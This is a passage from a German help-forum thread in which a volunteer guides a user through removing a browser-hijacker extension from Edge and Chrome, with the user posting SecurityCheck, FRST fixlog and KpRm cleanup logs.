- The service has stopped Windows-Remoteverwaltung (WS-Verwaltung) (WinRM) - The service has stopped ---------------------------- [ Antivirus_WMI ] ---------------------------- Windows Defender (enabled and up to date) Norton 360 for Gamers (disabled) ---------------------------- [ Firewall_WMI ] ----------------------------- Norton 360 for Gamers ---------------------- [ AntiVirusFirewallInstall ] ----------------------- Malwarebytes version 5.1.6.117 v.5.1.6.117 Norton 360 v.22.24.2.6 --------------------------- [ OtherUtilities ] ---------------------------- Microsoft 365 - de-de v.16.0.15225.20204 Warning! Download Update How Install Office updates? Microsoft 365 - en-us v.16.0.15225.20204 Warning! Download Update How Install Office updates? Microsoft 365 - es-es v.16.0.15225.20204 Warning! Download Update How Install Office updates? Microsoft 365 - fr-fr v.16.0.15225.20204 Warning! Download Update How Install Office updates? Microsoft 365 - it-it v.16.0.15225.20204 Warning! Download Update How Install Office updates? NVIDIA GeForce Experience 3.27.0.120 v.3.27.0.120 Warning! Download Update Microsoft Visual Studio Code (User) v.1.90.2 Warning! Download Update Microsoft Edge WebView2-Laufzeit v.126.0.2592.113 Steam v.2.10.91.91 Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 v.14.36.32532.0 Warning! Download Update Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 v.14.36.32532.0 Warning! Download Update ------------------------------- [ Backup ] -------------------------------- Microsoft OneDrive v.24.132.0701.0002 [+] ------------------------------ [ ArchAndFM ] ------------------------------ WinRAR 6.23 (64-Bit) v.6.23.0 Warning! Download Update ------------------------------- [ Imaging ] ------------------------------- GIMP 2.10.34-2 v.2.10.34 Warning! Download Update -------------------------- [ IMAndCollaborate ] --------------------------- Discord v.1.0.9023 Warning! Download Update -------------------------------- [ Media ] -------------------------------- VLC media player v.3.0.20 Warning! Download Update ------------------------------- [ Browser ] ------------------------------- Opera GX Stable 109.0.5097.142 v.109.0.5097.142 Warning! Download Update Brave v.127.1.68.128 [+] Google Chrome v.127.0.6533.72 Warning! Download Update Microsoft Edge v.126.0.2592.113 ------------------ [ AntivirusFirewallProcessServices ] ------------------- Malwarebytes Service (MBAMService) - The service is running C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe v.3.2.0.1306 Norton Security (NortonSecurity) - The service is running C:\Program Files\Norton Security\Engine\22.24.2.6\NortonSecurity.exe v.17.2.3.65 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MsMpEng.exe v.4.18.24060.7 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\NisSrv.exe v.4.18.24060.7 Microsoft Defender Antivirus-Dienst (WinDefend) - The service is running Microsoft Defender Antivirus-Netzwerkinspektionsdienst (WdNisSvc) - The service is running ---------------------------- [ UnwantedApps ] ----------------------------- Bonjour v.3.1.0.1 Warning! Application is distributed through the partnership programs and bundle assemblies. Uninstallation recommended. Possible you became a victim of fraud or social engineering. Combo Cleaner v.1.0.63.0 << Hidden Warning! Suspected demo version of anti-spyware, driver updater or optimizer. If this program is not familiar to you it is recommended to uninstall it and execute PC scanning using Malwarebytes Anti-Malware. Possible you became a victim of fraud or social engineering. Computer experts no longer recommend this program. ----------------------------- [ End of Log ] ------------------------------ |
|
25.07.2024, 14:08
| #9 |
| /// TB-Ausbilder | Windows 11: Policy in Edge Und Chrome Browser nicht deaktivierbar, lädt Beautiful New Tab(Edge) und Qtr Search(Chrome) Hijacker Erweiterung Gut gemacht. Ein kleiner Eintrag der Adware ist noch in Edge zu sehen. Den sollten wir noch kurz entfernen... die Reparatur dazu dauert nur ganz kurz. Schritt 1 WARNUNG AN ALLE MITLESER !!! Dieses FRST-Skript ist ausschließlich für diesen Nutzer gedacht und sollte niemals 1:1 für ein anderes System verwendet werden!
Schritt 2 Die folgenden Programme sind veraltet. Du solltest sie deinstallieren und die neueste Version installieren. Die Downloadlinks dazu findest du in der Logdatei von SecurityCheck.
Microsoft Office bitte noch updaten, z. B. so:
Entfernung der verwendeten Tools Führe KpRm gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei. Dann wären wir durch! Wenn du keine Probleme mehr mit Malware hast, dann sind wir hier fertig. Deine Logdateien sind sauber.  Wenn Du möchtest, kannst Du hier sagen, ob du mit uns und unserer Hilfe zufrieden warst...  Vielleicht möchtest du das Forum mit einer kleinen Spende  unterstützen.  Zum Schluss bitte unbedingt die Sicherheitsmaßnahmen lesen und umsetzen: Hinweis: Bitte gib mir eine kurze Rückmeldung, sobald du die oben verlinkten Informationen gelesen hast, alles erledigt ist und keine Fragen mehr vorhanden sind, so dass ich dieses Thema aus meinen Abos löschen kann. |
|
25.07.2024, 19:51
| #10 |
| | Windows 11: Policy in Edge Und Chrome Browser nicht deaktivierbar, lädt Beautiful New Tab(Edge) und Qtr Search(Chrome) Hijacker Erweiterung Danke für die Hilfe FRST Log: Code:
ATTFilter Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 25.07.2024
durchgeführt von skysc (25-07-2024 20:39:42) Run:2
Gestartet von C:\Users\skysc\Downloads\Neuer Ordner
Geladene Profile: skysc
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
Start::
CloseProcesses:
Edge NewTab: Default -> Active:"chrome-extension://fepbfegljfpfclgajmjlmnhdillncgke/newtabHTML.html"
Reboot:
End::
*****************
Prozesse erfolgreich geschlossen.
"NewTab" => nicht gefunden
Das System musste neu gestartet werden.
==== Ende von Fixlog 20:39:43 ====
Als ich Microsoft office updaten wollte kahm der Fehlercode 30182-27 (53) Falls sie tipps haben bitte schreiben. Und hier noch der Log von KpRm: Code:
ATTFilter # Run at 25.07.2024 20:48:53
# KpRm (Kernel-panik) version 2.17.0
# Website https://kernel-panik.me/tool/kprm/
# Run by skysc from C:\Users\skysc\AppData\Local\Temp\scoped_dir14852_1140157467
# Computer Name: SKYSGAMINGPC-CA
# OS: Windows 11 X64 (22631) (10.0.22631.3880)
# Number of passes: 1
- Checked options -
~ Delete Tools
~ Delete Quarantines
- Delete Tools -
## AdwCleaner
[OK] C:\Users\skysc\Downloads\adwcleaner (1).exe deleted
[OK] C:\Users\skysc\Downloads\adwcleaner.exe deleted
[OK] C:\AdwCleaner deleted
## FRST
[OK] C:\Users\skysc\Desktop\Fixlog.txt deleted
[OK] C:\Users\skysc\Downloads\Addition.txt deleted
[OK] C:\Users\skysc\Downloads\FRST (1).txt deleted
[OK] C:\Users\skysc\Downloads\FRST-OlderVersion deleted
[OK] C:\Users\skysc\Downloads\FRST.txt deleted
[OK] C:\Users\skysc\Downloads\Neuer Ordner\Addition.txt deleted
[OK] C:\Users\skysc\Downloads\Neuer Ordner\Fixlog.txt deleted
[OK] C:\Users\skysc\Downloads\Neuer Ordner\FRST-OlderVersion deleted
[OK] C:\Users\skysc\Downloads\Neuer Ordner\FRST.txt deleted
[OK] C:\Users\skysc\Downloads\Neuer Ordner\FRST64 (1).exe deleted
[OK] C:\FRST deleted
## SecurityCheck
[OK] C:\Users\skysc\Downloads\SecurityCheck.exe deleted
[OK] C:\SecurityCheck deleted
-- KPRM finished in 2.72s --
|
|
26.07.2024, 22:09
| #11 |
| /// TB-Ausbilder | Windows 11: Policy in Edge Und Chrome Browser nicht deaktivierbar, lädt Beautiful New Tab(Edge) und Qtr Search(Chrome) Hijacker Erweiterung Bezüglich des Fehlercodes kann ich leider nicht helfen. Wir sind froh, dass wir helfen konnten  Dieses Thema scheint erledigt und wird aus unseren Abos gelöscht. Solltest Du das Thema erneut brauchen, schicke uns bitte eine Erinnerung inklusive Link zum Thema. Jeder andere bitte hier klicken und ein eigenes Thema erstellen. |
|
| Themen zu Windows 11: Policy in Edge Und Chrome Browser nicht deaktivierbar, lädt Beautiful New Tab(Edge) und Qtr Search(Chrome) Hijacker Erweiterung |
| administrator, adware entfernen, autorun, avast, bonjour, browser, browser adblocker entfernen, browser extensions entfernen, cpu, desktop, error, google, homepage, installation, internet, prozesse, realtek, registry, rundll, security, services.exe, software, svchost.exe, symantec, system, updates, usb, windows |
Lesestoff:
Linear-Darstellung
